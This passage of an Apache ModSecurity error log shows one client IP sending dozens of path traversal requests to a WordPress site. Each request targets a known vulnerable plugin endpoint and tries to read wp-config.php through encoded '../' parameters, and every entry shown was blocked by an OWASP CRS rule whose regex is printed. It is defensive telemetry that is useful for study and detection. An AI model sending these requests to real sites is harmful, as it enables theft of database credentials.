"Y8DxCsPRCDYHCWWhHpAjqAAAAAE"] [Fri Jan 13 00:50:02.583603 2023] [:error] [pid 31042:tid 140315188991744] [client 185.206.224.212:42782] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/site-import/admin/page.php?url=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/site-import/admin/page.php"] [unique_id "Y8DxCo6vAq65Ygpdg5ObMAAAAFE"] [Fri Jan 13 00:50:02.700186 2023] [:error] [pid 31042:tid 140315397105408] [client 185.206.224.212:42784] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/sniplets/modules/syntax_highlight.php"] [unique_id "Y8DxCo6vAq65Ygpdg5ObMQAAAEE"] [Fri Jan 13 00:50:02.833854 2023] [:error] [pid 31042:tid 140315205777152] [client 185.206.224.212:42786] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/spicy-blogroll/spicy-blogroll-ajax.php?var2=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/spicy-blogroll/spicy-blogroll-ajax.php"] [unique_id "Y8DxCo6vAq65Ygpdg5ObMgAAAE8"] [Fri Jan 13 00:50:02.949325 2023] [:error] [pid 31043:tid 140315155420928] [client 185.206.224.212:42788] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/tera-charts/charts/treemap.php?fn=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/tera-charts/charts/treemap.php"] [unique_id "Y8DxCsx9A9c0KkSpLadP_QAAAJU"] [Fri Jan 13 00:50:03.065070 2023] [:error] [pid 31042:tid 140315172206336] [client 185.206.224.212:42792] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/tera-charts/charts/zoomabletreemap.php"] [unique_id "Y8DxC46vAq65Ygpdg5ObMwAAAFM"] [Fri Jan 13 00:50:03.180823 2023] [:error] [pid 31042:tid 140315230955264] [client 185.206.224.212:42794] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/thecartpress/checkout/CheckoutEditor.php"] [unique_id "Y8DxC46vAq65Ygpdg5ObNAAAAEw"] [Fri Jan 13 00:50:03.298961 2023] [:error] [pid 31041:tid 140315239347968] [client 185.206.224.212:42796] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/thinkun-remind/exportData.php?dirPath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/thinkun-remind/exportData.php"] [unique_id "Y8DxC8PRCDYHCWWhHpAjqQAAAAs"] [Fri Jan 13 00:50:03.423296 2023] [:error] [pid 31476:tid 140315180599040] [client 185.206.224.212:42800] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"] [unique_id "Y8DxC6GMrWzzUVMdEhcLvQAAANI"] [Fri Jan 13 00:50:03.537916 2023] [:error] [pid 31476:tid 140315163813632] [client 185.206.224.212:42802] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ungallery/source_vuln.php"] [unique_id "Y8DxC6GMrWzzUVMdEhcLvgAAANQ"] [Fri Jan 13 00:50:03.654440 2023] [:error] [pid 31476:tid 140315272918784] [client 185.206.224.212:42804] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/image-processor.php?demo=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/image-processor.php"] [unique_id "Y8DxC6GMrWzzUVMdEhcLvwAAAMc"] [Fri Jan 13 00:50:03.770321 2023] [:error] [pid 31476:tid 140315405498112] [client 185.206.224.212:42806] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wechat-broadcast/wechat/Image.php"] [unique_id "Y8DxC6GMrWzzUVMdEhcLwAAAAMA"] [Fri Jan 13 00:50:03.891150 2023] [:error] [pid 31476:tid 140315298096896] [client 185.206.224.212:42808] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wordtube/wordtube-button.php"] [unique_id "Y8DxC6GMrWzzUVMdEhcLwQAAAMQ"] [Fri Jan 13 00:50:04.006428 2023] [:error] [pid 31043:tid 140315289704192] [client 185.206.224.212:42810] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "Y8DxDMx9A9c0KkSpLadP_wAAAIU"] [Fri Jan 13 00:50:04.121487 2023] [:error] [pid 31476:tid 140315155420928] [client 185.206.224.212:42812] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php"] [unique_id "Y8DxDKGMrWzzUVMdEhcLwgAAANU"] [Fri Jan 13 00:50:04.238771 2023] [:error] [pid 31476:tid 140315264526080] [client 185.206.224.212:42814] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=..%2F..%2F..%2F..%2F&filename=wp-config.php&action=download"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-filemanager/incl/libfile.php"] [unique_id "Y8DxDKGMrWzzUVMdEhcLwwAAAMg"] [Fri Jan 13 00:50:04.354842 2023] [:error] [pid 31476:tid 140315239347968] [client 185.206.224.212:42816] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-imagezoom/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-imagezoom/download.php"] [unique_id "Y8DxDKGMrWzzUVMdEhcLxAAAAMs"] [Fri Jan 13 00:50:04.483396 2023] [:error] [pid 31043:tid 140315205777152] [client 185.206.224.212:42818] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-lytebox/main.php?pg=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-lytebox/main.php"] [unique_id "Y8DxDMx9A9c0KkSpLadQAAAAAI8"] [Fri Jan 13 00:50:04.598428 2023] [:error] [pid 31043:tid 140315163813632] [client 185.206.224.212:42820] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-miniaudioplayer/map_download.php?fileurl=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-miniaudioplayer/map_download.php"] [unique_id "Y8DxDMx9A9c0KkSpLadQAQAAAJQ"] [Fri Jan 13 00:50:04.713471 2023] [:error] [pid 31042:tid 140315405498112] [client 185.206.224.212:42822] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-mon/assets/download.php?type=octet%2Fstream&path=..%2F..%2F..%2F..%2F&name=wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-mon/assets/download.php"] [unique_id "Y8DxDI6vAq65Ygpdg5ObNQAAAEA"] [Fri Jan 13 00:50:04.828893 2023] [:error] [pid 31041:tid 140315405498112] [client 185.206.224.212:42824] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-publication-archive/includes/openfile.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-publication-archive/includes/openfile.php"] [unique_id "Y8DxDMPRCDYHCWWhHpAjqgAAAAA"] [Fri Jan 13 00:50:04.943736 2023] [:error] [pid 31476:tid 140315197384448] [client 185.206.224.212:42826] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-source-control/downloadfiles/download.php?path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "Y8DxDKGMrWzzUVMdEhcLxQAAANA"] [Fri Jan 13 00:50:05.058784 2023] [:error] [pid 31476:tid 140315388712704] [client 185.206.224.212:42830] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-swimteam/include/user/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id 